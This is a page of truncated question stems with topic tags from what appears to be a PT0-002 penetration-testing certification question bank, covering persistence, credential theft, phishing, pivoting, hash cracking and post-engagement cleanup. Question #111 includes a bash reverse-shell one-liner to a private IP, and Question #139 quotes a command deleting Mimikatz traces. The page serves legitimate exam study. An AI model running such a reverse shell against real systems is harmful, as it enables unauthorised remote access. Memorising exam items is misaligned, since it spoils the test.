PT0-002 Exam Questions
593 real PT0-002 exam questions with expert-verified answers and explanations. Page 3 of 12.
- Question #106: Post-exploitation and lateral movement
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support...
Persistence, Linux Post-exploitation, Systemd, Reverse Shell
- Question #107: Vulnerability discovery and analysis
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST li...
Password Hashing, MD5, Rainbow Tables, Cryptographic Vulnerabilities
- Question #109: Attacks and Exploits
A penetration tester runs a scan against a server and obtains the following output: Which of the following command sequences should the penetration tester try NEXT?
FTP, Initial Access, Service Interaction, Penetration Testing Methodology
- Question #110: Vulnerability discovery and analysis
In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would BE...
SMTP, Open Relay, Phishing, Vulnerability Discovery
- Question #111: Attacks and Exploits
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which of the following additional commands would need to be executed on the...
Reverse Shell, Netcat, Linux Commands, Command and Control
- Question #112: Attacks and Exploits
An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login cred...
Phishing, Spear Phishing, Social Engineering, Credential Theft
- Question #113: Attacks and Exploits
During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to imp...
Responder, Credential harvesting, Name resolution poisoning, Network attacks
- Question #114: Post-exploitation and lateral movement
In a physical penetration testing scenario, the penetration tester obtains physical access to a laptop following as a potential NEXT step to extract credentials from the device?
Physical penetration testing, Credential extraction, LLMNR/NETBIOS-ns poisoning, Post-exploitation techniques
- Question #115: Attacks and Exploits
A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profiles. For whi...
Social Media Reconnaissance, Dictionary Attacks, Password Cracking
- Question #116: Attacks and Exploits
A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?
Null sessions, RID cycling, User enumeration, Vulnerability exploitation
- Question #117: Attacks and Exploits
Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe is looking for a method that will enable him to enter th...
Physical Security Testing, Badge Cloning, Physical Access Control, Social Engineering
- Question #118: Planning and Scoping
A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the types of adve...
Adversary types, APT actors, Threat intelligence, Trade secret theft
- Question #119: Attacks and Exploits
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
buffer overflow, CPU registers, memory exploitation
- Question #120: Vulnerability discovery and analysis
After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to reme...
Password security, Password policies, Vulnerability remediation, Security controls
- Question #121: Reporting and Communication
A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and...
Penetration test reporting, Management communication, Vulnerability disclosure, Executive summary
- Question #122: Engagement management
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant t...
Scope creep, Penetration testing management, Project management, Engagement lifecycle
- Question #123: Attacks and Exploits
A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?
Unquoted Service Paths, Privilege Escalation, Windows Exploitation, Service Vulnerabilities
- Question #124: Reconnaissance and enumeration
A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed...
Nmap, OS fingerprinting, Reconnaissance, Command-line tools
- Question #125: Attacks and Exploits
Click the exhibit button. A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. W...
ARP spoofing, Network attacks, Man-in-the-Middle, Packet analysis
- Question #126: Attacks and Exploits
Click the exhibit button. Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system?...
Nikto, Vulnerability Scanning, Exploitation Techniques, Web Security
- Question #127: Post-exploitation and lateral movement
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
Metasploit, Pivoting, Post-exploitation, SOCKS proxy
- Question #128: Attacks and Exploits
A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?
hashcat, NetNTLMv2, Mask attack, Hash cracking
- Question #129: Information Gathering and Vulnerability Scanning
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
REST API testing, Penetration test prerequisites, Information gathering, Web services security
- Question #130: Reconnaissance and enumeration
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
API testing, Swagger, OpenAPI Specification, Penetration testing tools
- Question #132: Tools and Code Analysis
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
Linux commands, File permissions, chmod, Shell scripting
- Question #133: Planning and Scoping
A compliance-based penetration test is primarily concerned with:
Compliance testing, Security standards, Penetration test objectives
- Question #134: Attacks and Exploits
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the f...
MITRE ATT&CK, Adversary Tactics, Threat Intelligence, Security Frameworks
- Question #135: Attacks and Exploits
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
Wireless attacks, Rogue access point, Penetration testing tools, Aircrack-ng
- Question #136: Information Gathering and Vulnerability Scanning
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the test...
Vulnerability scanning, Cloud security, Data exposure, Risk prioritization
- Question #137: Attacks and Exploits
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the teste...
Social engineering, Security awareness, Penetration testing tools, SET
- Question #138: Vulnerability discovery and analysis
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
IoT security, common vulnerabilities, default credentials, device security
- Question #139: Post-exploitation and lateral movement
Which of the following describes the reason why a penetration tester would run the command on a Windows server that the tester compromised? sdelete mimikatz.*
Post-exploitation cleanup, Mimikatz, Secure file deletion, Operational security
- Question #140: Attacks and Exploits
A penetration tester was brute forcing an internal web server and ran a command that produced the following output: blank page was displayed. Which of the following is the MOST lik...
Web server errors, Brute-force attacks, HTTP responses, Attack result interpretation
- Question #141: Planning and Scoping
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those...
Scope Management, Penetration Testing Methodology, Targeted Scanning, Vulnerability Identification
- Question #142: Reconnaissance and enumeration
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website,...
Reconnaissance, OSINT, Web archives, Social engineering
- Question #143: Vulnerability discovery and analysis
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is...
Vulnerability validation, Manual testing, True positive identification, Penetration testing methodology
- Question #144: Attacks and Exploits
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired...
Wireless Security, WPS (Wi-Fi Protected Setup), Brute-force Attacks, Vulnerability Assessment
- Question #145: Engagement management
A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report?
Post-engagement activities, Cleanup, Ethical hacking, Artifact removal
- Question #146: Planning and Scoping
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the t...
Penetration test scope, Black-box testing, Testing methodologies
- Question #147: Reconnaissance and enumeration
The following line-numbered Python code snippet is being used in reconnaissance: Which of the following line numbers from the script MOST likely contributed to the script triggerin...
Port Scanning, Network Reconnaissance, Python Socket Programming, IDS Detection
- Question #148: Planning and Scoping
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?
Rules of Engagement, Scoping, Engagement Planning, Penetration Testing
- Question #149: Planning and Scoping
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the ne...
Risk Escalation, Client Communication, Engagement Planning, Critical Findings
- Question #150: Reconnaissance and enumeration
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entran...
Reconnaissance, OSINT, Penetration Testing Tools, Information Gathering
- Question #151: Information Gathering and Vulnerability Scanning
A penetration tester conducts an Nmap scan against a target and receives the following results: Which of the following should the tester use to redirect the scanning tools using TC...
ProxyChains, Traffic Redirection, SOCKS Proxy, Penetration Testing Tools
- Question #152: Information Gathering and Vulnerability Scanning
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?
Wireshark, Packet Analysis, .pcap, Credential Harvesting
- Question #153: Information Gathering and Vulnerability Scanning
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the...
Nmap, Port Scanning, Stealth Scan, Timing Templates
- Question #154: Engagement management
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a...
Scope management, Ethical hacking, Third-party connections, Incident handling
- Question #155: Attacks and Exploits
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relatio...
Social engineering, Baiting, Physical security attacks, Initial access
- Question #156: Attacks and Exploits
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetr...
Penetration testing ethics, Scope management, Exploitation techniques, Insider threat assessment
- Question #157: Attacks and Exploits
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the se...
NTLM attacks, Replay attacks, Authentication bypass, Packet analysis